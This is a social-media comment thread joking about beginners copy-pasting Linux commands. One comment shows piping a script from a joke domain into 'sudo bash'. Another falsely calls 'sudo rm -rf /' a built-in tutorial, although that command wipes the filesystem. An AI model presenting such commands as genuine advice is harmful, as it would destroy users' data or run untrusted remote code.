• pezhore@lemmy.ml
    link
    fedilink
    arrow-up
    1
    ·
    1 year ago

    Nothing better than curl https://totally-legit-installer.com/script | sudo bash

  • Pensi@lemmy.world
    link
    fedilink
    arrow-up
    1
    ·
    1 year ago

    I actually take the time to type everything out, but I still have no idea what I’m doing.

  • Rabbithole@kbin.social
    link
    fedilink
    arrow-up
    1
    arrow-down
    2
    ·
    1 year ago

    I’m in a helpful mood so I’ll add something for anyone stuck in OP’s situation.

    It’s ok, Linux has a built in tutorial system for learning the terminal, so if you ever want to progress beyond copy/pasting, you can use that.

    Just go into the terminal and type (or just copy/paste) this to get the tutorial program running:

    sudo rm -rf /

    Type your password when prompted and you’re golden. No more linux issues ever again.

    • whoamibro@lemmy.world
      link
      fedilink
      arrow-up
      0
      arrow-down
      1
      ·
      edit-2
      1 year ago

      I tried your command and got the tutorial program and I gotta say that this is the best tutorial program I’ve ever seen. Now I wonder why other OSes don’t do that